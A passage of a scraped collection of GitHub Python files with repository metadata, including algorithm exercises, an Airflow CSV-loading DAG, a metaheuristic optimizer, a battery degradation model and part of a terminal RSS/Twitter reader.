0)), ax=Ax[iStn * 2 + 1, nTop])\n\n # save\n # lib.show()\n # import pdb; pdb.set_trace()\n lib.shSvPath(pdfPath)\n\nif __name__ == '__main__':\n # argument\n parser = argparse.ArgumentParser()\n parser.add_argument('inputs', nargs='+', help='dbe ver con')\n parser.add_argument('--nstn', help='#stn', default=1, dest='nStn', type=int)\n parser.add_argument('--epo', help='epo range', default='1:2', dest='epos')\n parser.add_argument('--bat', help='batch range', default='1:2', dest='bats')\n args = parser.parse_args()\n\n dbe = args.inputs[0]\n ver = args.inputs[1]\n con = args.inputs[2]\n\n epos = lib.str2ran(args.epos)\n bats = lib.str2ran(args.bats)\n\n nEpo = len(epos)\n nBat = len(bats)\n nStn = args.nStn\n\n # each epoch\n lib.prCIn('epo', nEpo, 1)\n for iEpo in range(nEpo):\n lib.prC(iEpo)\n\n # shEpoTran(dbe, ver, con, nStn, epo)\n # shEpoGrad(dbe, ver, con, nStn, epo)\n\n lib.prCIn('bat', nBat, 1)\n for iBat in range(nBat):\n lib.prC(iBat)\n # shEpoTrImg(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n shEpoTrGrid(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n # shEpoTran(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n lib.prCOut(nBat)\n lib.prCOut(nEpo)\n","repo_name":"zhfe99/th_rec","sub_path":"vis_deb.py","file_name":"vis_deb.py","file_ext":"py","file_size_in_byte":13756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
+{"seq_id":"4983021571","text":"class Solution:\n def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n results = [[]]\n nums = sorted(nums)\n k = 0\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n k += 1\n else:\n k = 0\n nres = results[:]\n for p in results:\n if (i == 0 or nums[i] != nums[i-1]):\n nres.append(p + [nums[i]])\n else:\n # Only append if the final k elems of p are all nums[i]\n if len(p) >= k and p[-k:] == [nums[i]] * k:\n nres.append(p + [nums[i]])\n results = nres\n\n return results\n\n \n","repo_name":"ZiningZhu/Leetcode","sub_path":"090-subsets2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25654799919","text":"import sys\nimport re\n\n\nfor line in sys.stdin:\n line = line.rstrip()\n print(re.match(r'\\b(\\w)(\\w)', line).groups())\n # line = re.sub(r'\\b(\\w)(\\w)(\\w*)\\b', r'\\2\\1\\3', line)\n line = re.sub(r'\\b(\\w)(\\w)', r'\\2\\1', line)\n print(line)","repo_name":"ayurkin/stepik_python_course","sub_path":"kurs_re_8.py","file_name":"kurs_re_8.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16631127603","text":"from matplotlib import pyplot as plt\nimport os\nimport glob\nimport argparse\nimport torch\n\n\ndef cal_EPE(gt_flow, est_flow):\n return torch.norm(gt_flow - est_flow, 2, 1).mean()\n\n\norigin_path = 'C:/Users/zihaozhang/Desktop/git/FlowFormer-Official/datasets/abandonedfactory/Easy/P001/image_left/'\ngt_path = 'C:/Users/zihaozhang/Desktop/git/FlowFormer-Official/datasets/abandonedfactory/Easy/P001/flow_img/'\nflowformer_path = 'results/tartanair/things/'\npwcnet_path = 'results/tartanair/PWCNet/'\nsave_path = 'compare/tartanair/'\nif not os.path.exists(save_path):\n os.makedirs(save_path)\npattern = os.path.join(flowformer_path, '*.png')\nfilelist = sorted(glob.glob(pattern))\nfor i in range(367, len(filelist)):\n #4x4\n plt.subplot(221)\n plt.imshow(plt.imread(origin_path + str(i).zfill(6) + '_left.png'))\n plt.axis('off')\n plt.title('Source Image')\n plt.subplot(222)\n plt.imshow(plt.imread(gt_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('Ground Truth')\n plt.savefig(save_path + str(i).zfill(6) + '.png')\n plt.subplot(223)\n plt.imshow(plt.imread(flowformer_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('FlowFormer')\n plt.subplot(224)\n plt.imshow(plt.imread(pwcnet_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('PWCNet')\n plt.savefig(save_path + str(i).zfill(6) + '.png')\n plt.close()\n print('已保存:{}/{}'.format(i + 1, len(filelist)))\n","repo_name":"Continy/FlowFormer","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24638749199","text":"\nimport requests\nimport csv\nfrom airflow import DAG\nfrom datetime import datetime\n\nfrom airflow.operators.python import PythonOperator\nfrom airflow.providers.postgres.operators.postgres import PostgresHook\nfrom airflow.providers.discord.operators.discord_webhook import DiscordWebhookOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\n\ncsv_path = \"/Users/pedro/grouparoo/airflow-test/data.csv\"\nwebhook_endpoint = \"webhooks/SOME_SECRET/WEBHOOK\"\n\ndef download_csv():\n resp = 
requests.get(\"https://raw.githubusercontent.com/grouparoo/grouparoo/main/core/__tests__/data/records-10.csv\")\n with open(csv_path, \"wb\") as f:\n for chunk in resp:\n f.write(chunk)\n\ndef load_csv():\n pg = PostgresHook(postgres_conn_id=\"grouparoo_profile_db\")\n\n with open(csv_path, 'r') as f:\n reader = csv.reader(f)\n rows = [tuple(row) for row in reader][1:]\n pg.insert_rows(\n \"profiles\", \n rows, \n target_fields=[\n \"id\", \n \"first_name\", \n \"last_name\", \n \"email\", \n \"gender\", \n \"ip_address\", \n \"ios_app\", \n \"android_app\", \n \"vip\", \n \"ltv\"\n ], \n replace=True,\n replace_index=\"id\"\n )\n\nwith DAG(\n 'grouparoo_demo', \n start_date=days_ago(1),\n schedule_interval=None\n) as dag:\n download = PythonOperator(\n task_id=\"download_csv\", \n python_callable=download_csv\n )\n\n load = PythonOperator(\n task_id=\"load_data\", \n python_callable=load_csv\n )\n\n grouparoo = BashOperator(\n task_id=\"run_grouparoo\", \n bash_command=\"cd ~/grouparoo/airflow-test && grouparoo run\"\n )\n\n notify_end = DiscordWebhookOperator(\n task_id=\"notify_end\", \n http_conn_id=\"discord\", \n webhook_endpoint=webhook_endpoint, \n message=\"Your workflow has finished running!\"\n )\n\n download >> load >> grouparoo >> notify_end\n\n","repo_name":"pedroslopez/airflow-demo","sub_path":"dags/grouparoo.py","file_name":"grouparoo.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70152876281","text":"# This code solves the problem of finding the minimum number of operations needed\n# to transform a given number n into 1 using three possible operations\n\nimport math\n\nn = int(input())\n\n# number of operations required for getting 0, 1, 2,.. 
, n\n# list where each index i holds the minimum number of operations needed to transform the number i into 1.\nnum_operations = [0, 0] + [math.inf] * (n - 1)\n\nfor i in range(2, n + 1):\n temp1, temp2, temp3 = [math.inf] * 3\n\n temp1 = num_operations[i - 1] + 1\n if i % 2 == 0:\n temp2 = num_operations[i // 2] + 1\n if i % 3 == 0:\n temp3 = num_operations[i // 3] + 1\n min_ops = min(\n temp1, temp2, temp3\n ) # holds the minimum value among the three operations' costs,\n num_operations[i] = min_ops # and this value is stored in num_operations[i].\n\n\nprint(num_operations[n])\n\n# This second part is a backtracking process to reconstruct the sequence of numbers that leads to the minimum operations.\n# Backtracking the numbers leading to n\nnums = [n]\nwhile n != 1: # loop continues until n becomes 1.\n # Inside the loop, it checks which operation was responsible for reaching the current value of n with the minimum operations.\n # It then updates n and appends the corresponding number to the nums list.\n if n % 3 == 0 and num_operations[n] - 1 == num_operations[n // 3]:\n nums += [n // 3]\n n = n // 3\n elif n % 2 == 0 and num_operations[n] - 1 == num_operations[n // 2]:\n nums += [n // 2]\n n = n // 2\n else:\n nums += [n - 1]\n n = n - 1\n\nprint(\" \".join([str(i) for i in nums][::-1]))\n","repo_name":"pedarias/Coursera_Data_Structures_and_Algorithms_Specialization","sub_path":"Course1_Algorithmic_Toolbox/week5_dynamic_programming1/2_primitive_calculator/primitive_calculator.py","file_name":"primitive_calculator.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36403945707","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\ndef find_string(str, findstr):\n # 查找字符串中指定���子串\n print(\"查找带{}的字符串位置,不存在返回-1,结果:\".format(findstr), str.find(findstr))\n\n\ndef replace_string(str, data, repl):\n # 查找替换\n newstr = str.replace(data, repl)\n print(\"输出一个新的字符串\", newstr)\n\n\nif __name__ == '__main__':\n data = [\"你好\", \"HELLO WORD\"]\n for n in data:\n print(\"字符串的长度为:\", len(n))\n # 查找带H子串的str并返回下标,不存在返回-1\n find_string(n, \"WORD\")\n # 查找WORD替换为Python,找不到既不修改直接赋值\n replace_string(n, \"WORD\", \"PYTHON\")\n print(\"*\" * 100, \"\\n\")\n","repo_name":"TrellixVulnTeam/PythonDemo_IQ8M","sub_path":"Python05StringMethodDemo/String_05_find_string_method.py","file_name":"String_05_find_string_method.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44019459510","text":"n=int(input())\nal=list(map(int, input().split()))\n\nfrom itertools import product\nite = list(product(range(2),repeat=n-1))\nans=10**18\nfor pattern in ite:\n xors=0\n val=0\n # flag=False\n for i, v in enumerate(pattern):\n a=al[i]\n val=val|a\n if v: \n flag=True\n xors=xors^val\n val=0\n # else:\n # val=\n val=val|al[-1]\n xors=xors^val\n ans=min(ans,xors)\nprint(ans)","repo_name":"nami4mo/competitive-programming-problems","sub_path":"algo_contest/previous/abc197/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2111400751","text":"#!/usr/bin/env python\n# Created by \"Thieu\" at 21:34, 11/03/2023 ----------%\n# Email: nguyenthieu2102@gmail.com % \n# Github: https://github.com/thieu1995 % \n# --------------------------------------------------%\n\nimport numpy as np\nfrom mealpy.optimizer import 
Optimizer\n\n\nclass OriginalServalOA(Optimizer):\n \"\"\"\n The original version of: Serval Optimization Algorithm (ServalOA)\n\n Links:\n 1. https://www.mdpi.com/2313-7673/7/4/204\n\n Notes:\n 0. It's concerning that the author seems to be reusing the same algorithms with minor variations.\n 1. Algorithm design is similar to Zebra Optimization Algorithm (ZOA), Osprey Optimization Algorithm (OOA), Coati Optimization Algorithm (CoatiOA), Siberian Tiger Optimization (STO), Language Education Optimization (LEO), Pelican Optimization Algorithm (POA), Walrus Optimization Algorithm (WOA), Fennec Fox Optimization (FFO), Three-periods optimization algorithm (TPOA), Teamwork optimization algorithm (TOA), Northern goshawk optimization (NGO), Tasmanian devil optimization (TDO), Archery algorithm (AA), Cat and mouse based optimizer (CMBO)\n 3. It may be useful to compare the Matlab code of this algorithm with those of the similar algorithms to ensure its accuracy and completeness.\n 4. The article may share some similarities with previous work by the same authors, further investigation may be warranted to verify the benchmark results reported in the papers and ensure their reliability and accuracy.\n\n Examples\n ~~~~~~~~\n >>> import numpy as np\n >>> from mealpy.swarm_based.ServalOA import OriginalServalOA\n >>>\n >>> def fitness_function(solution):\n >>> return np.sum(solution**2)\n >>>\n >>> problem_dict1 = {\n >>> \"fit_func\": fitness_function,\n >>> \"lb\": [-10, -15, -4, -2, -8],\n >>> \"ub\": [10, 15, 12, 8, 20],\n >>> \"minmax\": \"min\",\n >>> }\n >>>\n >>> epoch = 1000\n >>> pop_size = 50\n >>> model = OriginalServalOA(epoch, pop_size)\n >>> best_position, best_fitness = model.solve(problem_dict1)\n >>> print(f\"Solution: {best_position}, Fitness: {best_fitness}\")\n\n References\n ~~~~~~~~~~\n [1] Dehghani, M., & Trojovský, P. (2022). Serval Optimization Algorithm: A New Bio-Inspired\n Approach for Solving Optimization Problems. Biomimetics, 7(4), 204.\n \"\"\"\n def __init__(self, epoch=10000, pop_size=100, **kwargs):\n \"\"\"\n Args:\n epoch (int): maximum number of iterations, default = 10000\n pop_size (int): number of population size, default = 100\n \"\"\"\n super().__init__(**kwargs)\n self.epoch = self.validator.check_int(\"epoch\", epoch, [1, 100000])\n self.pop_size = self.validator.check_int(\"pop_size\", pop_size, [10, 10000])\n self.set_parameters([\"epoch\", \"pop_size\"])\n self.support_parallel_modes = False\n self.sort_flag = False\n\n def evolve(self, epoch):\n \"\"\"\n The main operations (equations) of algorithm. Inherit from Optimizer class\n\n Args:\n epoch (int): The current iteration\n \"\"\"\n kk = np.random.permutation(self.pop_size)[0]\n for idx in range(0, self.pop_size):\n # Phase 1: Prey Selection and Attacking (Exploration)\n pos_new = self.pop[idx][self.ID_POS] + np.random.rand(self.problem.n_dims) * \\\n (self.pop[kk][self.ID_POS] - np.random.randint(1, 3, self.problem.n_dims) * self.pop[idx][self.ID_POS])\n pos_new = self.amend_position(pos_new, self.problem.lb, self.problem.ub)\n tar_new = self.get_target_wrapper(pos_new)\n if self.compare_agent([pos_new, tar_new], self.pop[idx]):\n self.pop[idx] = [pos_new, tar_new]\n\n # Phase 2: Chase Process (Exploitation)\n pos_new = self.pop[idx][self.ID_POS] + np.random.randint(1, 3, self.problem.n_dims) * (self.problem.ub - self.problem.lb) / (epoch+1) # Eq. 
6\n pos_new = self.amend_position(pos_new, self.problem.lb, self.problem.ub)\n tar_new = self.get_target_wrapper(pos_new)\n if self.compare_agent([pos_new, tar_new], self.pop[idx]):\n self.pop[idx] = [pos_new, tar_new]\n","repo_name":"thieu1995/mealpy","sub_path":"mealpy/swarm_based/ServalOA.py","file_name":"ServalOA.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"40"} +{"seq_id":"74930873399","text":"import numpy as np\nimport rainflow\nfrom settings import DT as dt\n\nclass Battery:\n def __init__(self, Emax, Emin, Pmax, Pmin, eff, soc_ini, degModel=\"constant\"):\n self.Emax = Emax\n self.Emin = Emin\n self.Pmax = Pmax\n self.Pmin = Pmin\n self.Eini = soc_ini*self.Emax\n self.E = self.Eini\n self.eff = eff\n self.degModel = degModel\n \n def charge(self, dp_tgt):\n \n assert dp_tgt >= 0\n dp_tgt = min(dp_tgt, abs(self.Pmin))\n dE_pre = dp_tgt*dt - (1-np.sqrt(self.eff))*dp_tgt*dt\n room = self.Emax - self.E\n \n if room >= dE_pre:\n dE = dE_pre\n dp = dp_tgt \n else:\n dE = room\n dp = dE/(np.sqrt(self.eff)*dt)\n\n self.E += dE\n \n return dp\n \n def discharge(self, dp_tgt):\n \n assert dp_tgt >= 0\n dp_tgt = min(dp_tgt, self.Pmax)\n dE_pre = dp_tgt*dt + (1-np.sqrt(self.eff))*dp_tgt*dt\n reserve = self.E - self.Emin\n \n if reserve >= dE_pre:\n dE = dE_pre\n dp = dp_tgt\n else:\n dE = reserve\n dp = dE/((2-np.sqrt(self.eff))*dt)\n \n self.E -= dE\n return dp\n \n def degradate(self, degCap=0.05, degEff=0.02, Es=np.zeros(8640,), xs=np.zeros(8640,)):\n \n if self.degModel == \"constant\":\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n \n elif self.degModel == \"Xu\":\n kd1 = 1.4e5\n kd2 = -0.501e1\n kd3 = -1.23e5\n\n ks = 1.04\n SoC_ref = 0.50\n\n kt = 4.14e-10 # per second\n\n kT = 6.93e-2\n T_ref = 25\n\n fd = 0\n socs = Es/self.Emax\n cycles = rainflow.count_cycles(socs)\n\n # calendar aging\n Stime = kt*3600*8640 # 3600s per hour and 8640 hours per year\n fd += Stime\n\n # stress aging\n for depth, number in cycles:\n Sdod = (kd1*depth**kd2 + kd3)**-1 * number\n #Ssoc = np.exp(ks*(socs.mean()-SoC_ref))\n Ssoc = 1\n #Stemp = np.exp(kT*(T-T_ref)*(T_ref/T))\n Stemp = 1\n fd += Sdod*Ssoc*Stemp\n\n degCap = 1-np.exp(-fd)\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n \n elif self.degModel == \"Wang\":\n b = 31630\n T = 288\n R = 8.3145\n C_rate = 0.5\n if self.Emax > 0:\n Ah = np.abs(xs).sum()*dt/self.Emax\n else:\n Ah = 0\n\n if self.Emax < 0.7*self.Eini:\n print('Battery should be retired')\n\n degCap = b * np.exp((-31700 + 370.3*C_rate)/(R*T)) * (Ah**0.55)\n degCap /= 100\n self.Emax *= (1-degCap)\n self.eff *= (1-degEff)\n else:\n print(\"Degradation model not in the list of [constant, Xu, Wang], please specify.\")\n ","repo_name":"zuzhaoye/BESS-sizing","sub_path":"battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11293508711","text":"import json\nimport os\nimport re\nimport sys\nimport signal\nimport threading\nimport time\nimport urllib.request\nimport webbrowser\n\nfrom asciimatics.screen import Screen\nfrom asciimatics.effects import Print\nfrom asciimatics.scene import Scene\nfrom asciimatics.renderers import ColourImageFile, SpeechBubble\n\nfrom .common import p, FEEDS_FILE_NAME\nfrom .get_twitter import do as get_twitter_feeds\nfrom .get_rss import do as get_feeds_from_rss\n\n\nKEY = {\n \"up\": -204,\n \"down\": -206,\n \"shiftUp\": 
337,\n \"shiftDown\": 336,\n \"enter\": 10,\n \"space\": 32,\n \"tab\": -301,\n \"shiftTab\": -302,\n \"backspace\": -300,\n \"esc\": -1,\n \":\": ord(\":\"),\n \"h\": [ord(\"h\"), ord(\"H\")],\n \"?\": ord(\"?\"),\n \"r\": [ord(\"r\"), ord(\"R\")],\n \"s\": [ord(\"s\"), ord(\"S\")],\n \"w\": [ord(\"w\"), ord(\"W\")],\n \"j\": [ord(\"j\"), ord(\"J\")],\n \"k\": [ord(\"k\"), ord(\"K\")],\n \"o\": [ord(\"o\"), ord(\"O\")],\n \"q\": [ord(\"q\"), ord(\"Q\")],\n}\n\nKEYLIST = {\n \"arrow\": [KEY[\"up\"], KEY[\"down\"], KEY[\"shiftUp\"], KEY[\"shiftDown\"], KEY[\"esc\"]]\n + KEY[\"s\"]\n + KEY[\"w\"]\n + KEY[\"j\"]\n + KEY[\"k\"],\n \"number\": range(48, 58),\n}\n\nCONFIG = {\n \"color\": 16,\n \"mode\": \"list\",\n \"rowlimit\": -1,\n \"marqueeFields\": [\"title\", \"text\"],\n \"marqueeSpeed\": 20,\n \"marqueeSpeedReturn\": 400,\n \"marqueeDelay\": 40,\n \"marqueeDelayReturn\": 120,\n \"refresh\": 120, # twitter & RSS pooling interval (seconds)\n \"categories\": (),\n}\n\nif \"256\" in os.environ.get(\"TERM\", \"\"):\n CONFIG[\"color\"] = 256\n\nCOLOR = {\n \"default\": 7,\n \"number\": 7,\n \"numberselected\": 15,\n \"source\": 11,\n \"bluesource\": 3,\n \"time\": 8,\n \"selected\": 7,\n \"alertfg\": 15,\n \"alertbg\": 4,\n \"categoryfg\": 3,\n \"categorybg\": 0,\n \"categoryfgS\": 0,\n \"categorybgS\": 3,\n}\n\n\nif CONFIG[\"color\"] == 256:\n\n COLOR = {\n \"default\": 7,\n \"number\": 8,\n \"numberselected\": 15,\n \"source\": 2,\n \"bluesource\": 105,\n \"RTheaderS\": 6,\n \"time\": 8,\n \"selected\": 15,\n \"alertfg\": 15,\n \"alertbg\": 12,\n \"categoryfg\": 223,\n \"categorybg\": 235,\n \"categoryfgS\": 235,\n \"categorybgS\": 223,\n }\n\n# FIELDS syntax : (column, field, color key, space fill)\n\nFIELDS = {\n \"default\": [\n (1, \"sourceName\", \"source\", True),\n (20, \"title\"),\n (-1, \"pubDate\", \"time\"),\n ],\n \"twitter\": [\n (1, \"nickname\", \"bluesource\", True),\n (18, \"isLink\", \"default\"),\n (21, \"text\", \"default\"),\n (21, \"RTheader\", \"RTheader\"),\n (-1, \"pubDate\", \"time\"),\n ],\n}\n\ndata, CURRENT = {}, {}\n\nos.environ.setdefault(\"ESCDELAY\", \"10\")\n\n\ndef get_data(category=\"news\"):\n\n if category != \"twitter\":\n try:\n with open(os.path.join(p[\"path_data\"], \"rss_%s.json\" % category), \"r\") as c:\n d = json.load(c)\n except:\n d = get_feeds_from_rss(category)\n if not d:\n sys.exit(\"oops 1\")\n return d\n\n if os.path.isfile(os.path.join(p[\"path_data\"], \"oauth_twitter\")):\n try:\n with open(os.path.join(p[\"path_data\"], \"twitter_home.json\"), \"r\") as c:\n return json.load(c)\n except:\n pass\n\n try:\n d = get_twitter_feeds()\n if not d:\n sys.exit(\"oops 2\")\n return d\n except Exception as e:\n sys.exit(str(e))\n\n return None\n\n\ndef layout(screen):\n\n global data, CURRENT\n\n def reload_data():\n\n global data, CURRENT\n\n while True:\n\n time.sleep(1)\n\n c_category = CURRENT.get(\"category\")\n\n if (\n c_category in data\n and data[c_category] is not None\n and data[c_category].get(\"created_at\")\n and int(data[c_category].get(\"created_at\")) + CONFIG[\"refresh\"]\n < int(time.time())\n and not CONFIG.get(\"loading\")\n ):\n\n CONFIG[\"loading\"] = True\n\n alert(screen, \"UPDATING\")\n\n if c_category == \"twitter\":\n try:\n d = get_twitter_feeds(page=1)\n except Exception as e:\n CONFIG[\"loading\"] = False\n alert(screen, str(e))\n time.sleep(0.5)\n if c_category not in data:\n data[c_category] = {}\n data[c_category][\"created_at\"] = int(time.time())\n return\n else:\n d = 
get_feeds_from_rss(CURRENT[\"category\"])\n\n if not d:\n CONFIG[\"loading\"] = False\n alert(\n screen,\n \"Api limit exceeded\"\n if c_category == \"twitter\"\n else \"Update failed\",\n )\n time.sleep(0.5)\n if c_category not in data:\n data[c_category] = {}\n data[c_category][\"created_at\"] = int(time.time())\n return\n\n CONFIG[\"loading\"] = False\n\n data[c_category] = d\n\n if c_category != CURRENT[\"category\"]:\n return\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n i = -1\n for entry in data[c_category][\"entries\"]:\n i += 1\n if entry[\"id\"] == CURRENT[\"id\"]:\n CURRENT[\"line\"][CURRENT[\"category\"]] = i\n break\n CURRENT[\"line\"][CURRENT[\"category\"]] = i\n\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n def is_double_char(s):\n\n return (\n re.compile(\n \"(\\u00a9|\\u00ae|[\\u2000-\\u3300]|\\ud83c[\\ud000-\\udfff]|\\ud83d[\\ud000-\\udfff]|\\ud83e[\\ud000-\\udfff]|[가-힣]|[\\u4e00-\\u9fff]|[\\u3400-\\u4dbf]|[\\U00020000-\\U0002a6df]|[\\U0002a700-\\U0002b73f]|[\\U0002b740-\\U0002b81f]|[\\U0002b820-\\U0002ceaf])\"\n ).findall(s)\n != []\n )\n\n def text_length(s):\n\n return sum([2 if is_double_char(d) else 1 for d in s])\n\n def alert(screen, text):\n\n space = 3\n length = text_length(text) + space * 2\n text = \" \" * space + text + \" \" * space\n pos = (screen.width - len(text), 0)\n\n screen.print_at(\n text, pos[0], pos[1], colour=COLOR[\"alertfg\"], bg=COLOR[\"alertbg\"]\n )\n screen.refresh()\n\n def slice_text(s, l, max_width=80, shift=0):\n rslt = \"\"\n\n string_length = text_length(s)\n\n over = string_length > max_width\n\n if over: # to show a marquee\n if (\n string_length - shift + CONFIG[\"marqueeDelayReturn\"] < max_width\n or shift == -1\n ):\n if CURRENT.get(\"direction\", \"left\") == \"left\":\n CURRENT[\"direction\"] = \"right\"\n else:\n CURRENT[\"direction\"] = \"left\"\n\n if CURRENT.get(\"direction\", \"left\") == \"left\":\n if shift < CONFIG[\"marqueeDelay\"]:\n shift = 0\n else:\n shift -= CONFIG[\"marqueeDelay\"]\n\n if string_length - shift + max_width / 4 < max_width:\n shift = string_length - max_width + max_width / 4\n\n m = 0\n for d in s:\n m += 1\n if is_double_char(d):\n m += 1\n if not over:\n rslt += d\n else:\n if m == shift and is_double_char(d):\n rslt += \" \"\n elif m >= shift:\n rslt += d\n\n if m >= l + shift or m >= max_width + shift:\n break\n\n return rslt\n\n def draw_categories():\n\n screen.print_at(\n \".\" * screen.width, 0, 0, colour=COLOR[\"categorybg\"], bg=COLOR[\"categorybg\"]\n )\n\n x = 1\n for category in CONFIG[\"categories\"]:\n s = \" %s \" % category[1]\n if category[0] == CURRENT[\"category\"]:\n screen.print_at(\n s, x, 0, colour=COLOR[\"categoryfgS\"], bg=COLOR[\"categorybgS\"]\n )\n else:\n screen.print_at(\n s, x, 0, colour=COLOR[\"categoryfg\"], bg=COLOR[\"categorybg\"]\n )\n\n x += len(s) + 2\n\n def draw_entries(clearline=False, force=False, lines=False):\n\n category_ = CURRENT[\"category\"]\n if category_ not in FIELDS:\n category_ = \"default\"\n\n if data[CURRENT[\"category\"]] is None:\n return\n\n line_range = range(0, CONFIG[\"rowlimit\"])\n\n if lines:\n line_range = range(0, lines)\n\n elif CURRENT[\"line\"][CURRENT[\"category\"]] > -1 and not force:\n line_range = [CURRENT[\"line\"][CURRENT[\"category\"]]]\n if (\n CURRENT[\"oline\"] != CURRENT[\"line\"][CURRENT[\"category\"]]\n and CURRENT[\"oline\"] != -1\n ):\n line_range = [CURRENT[\"oline\"], CURRENT[\"line\"][CURRENT[\"category\"]]]\n\n for i in line_range:\n is_selected = (\n i == 
CURRENT[\"line\"][CURRENT[\"category\"]]\n ) and not CURRENT.get(\"input\", False)\n row = i + 1\n index = i + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n\n if is_selected:\n screen.print_at(\n \" \" * screen.width,\n 0,\n row,\n colour=COLOR[\"selected\"],\n bg=COLOR[\"selected\"],\n )\n else:\n screen.print_at(\" \" * screen.width, 0, row, colour=0, bg=0)\n\n if (\n CURRENT[\"line\"][CURRENT[\"category\"]] > -1\n and clearline\n and not force\n and not is_selected\n ):\n screen.refresh()\n\n for f in FIELDS[category_]:\n kcolor = 2 if len(f) > 2 else 1\n\n txt = data[CURRENT[\"category\"]][\"entries\"][index].get(f[1], \"\")\n\n if (\n is_selected\n and f[1] + \"S\" in data[CURRENT[\"category\"]][\"entries\"][index]\n ):\n txt = data[CURRENT[\"category\"]][\"entries\"][index][f[1] + \"S\"]\n if f[1] in data[CURRENT[\"category\"]][\"entries\"][index] and len(\n data[CURRENT[\"category\"]][\"entries\"][index][f[1]]\n ) > len(txt):\n\n txt += \" \" * (\n len(data[CURRENT[\"category\"]][\"entries\"][index][f[1]])\n - len(txt)\n )\n\n if txt == \"\":\n continue\n\n col = f[0]\n\n if col < 0:\n col = screen.width + col - len(txt)\n elif CURRENT.get(\"input\", False):\n col += 4\n\n fg = COLOR.get(f[kcolor], COLOR[\"default\"])\n bg = 0\n\n if i == CURRENT[\"line\"][CURRENT[\"category\"]] and not CURRENT.get(\n \"input\", False\n ):\n fg = 0\n bg = COLOR[\"selected\"]\n if COLOR.get(\"%sS\" % f[kcolor], None):\n fg = COLOR[\"%sS\" % f[kcolor]]\n\n if is_selected and f[1] in CONFIG[\"marqueeFields\"]:\n txt = slice_text(\n txt,\n screen.width - col - 1,\n max_width=screen.width - col,\n shift=CURRENT[\"shift\"],\n )\n\n if col > 1:\n col -= 1\n txt = \" %s \" % txt\n\n if len(f) > 3:\n txt += \" \" * 20\n\n try:\n screen.print_at(txt, col, row, colour=fg, bg=bg)\n except:\n pass\n\n if (\n CURRENT[\"line\"][CURRENT[\"category\"]] > -1\n and clearline\n and not force\n and not is_selected\n ):\n screen.refresh()\n\n if force and line_range[-1] + 1 < screen.height - 1:\n for i in range(line_range[-1] + 2, screen.height):\n screen.print_at(\" \" * screen.width, 0, i, colour=0, bg=0)\n\n screen.refresh()\n\n def page_up():\n if CURRENT[\"page\"][CURRENT[\"category\"]] == 0:\n CURRENT[\"line\"][CURRENT[\"category\"]] = 0\n alert(screen, \"top of the list\")\n time.sleep(0.5)\n draw_categories()\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CONFIG[\"rowlimit\"] - 1\n CURRENT[\"page\"][CURRENT[\"category\"]] -= 1\n CONFIG[\"rowlimit\"] = screen.height - 2\n\n def page_down():\n if (\n len(data[CURRENT[\"category\"]][\"entries\"])\n - (CURRENT[\"page\"][CURRENT[\"category\"]] + 1) * (screen.height - 2)\n < CONFIG[\"rowlimit\"]\n ):\n CURRENT[\"line\"][CURRENT[\"category\"]] = CONFIG[\"rowlimit\"] - 1\n alert(screen, \"end of the list\")\n time.sleep(0.5)\n draw_categories()\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = 0\n CURRENT[\"page\"][CURRENT[\"category\"]] += 1\n CONFIG[\"rowlimit\"] = screen.height - 2\n\n def do_timer():\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n CURRENT[\"shift\"] = CURRENT.get(\"shift\", 0) + (\n 1 if CURRENT.get(\"direction\", \"left\") == \"left\" else -1\n )\n draw_entries()\n screen.refresh()\n\n def reset_list_arrow_key():\n CURRENT[\"shift\"] = 0\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n\n def show_current_input_number():\n\n line_range = range(0, CONFIG[\"rowlimit\"])\n\n try:\n currentNumber = int(CURRENT[\"inputnumber\"])\n except:\n currentNumber = \"\"\n\n for i in line_range:\n fg = 
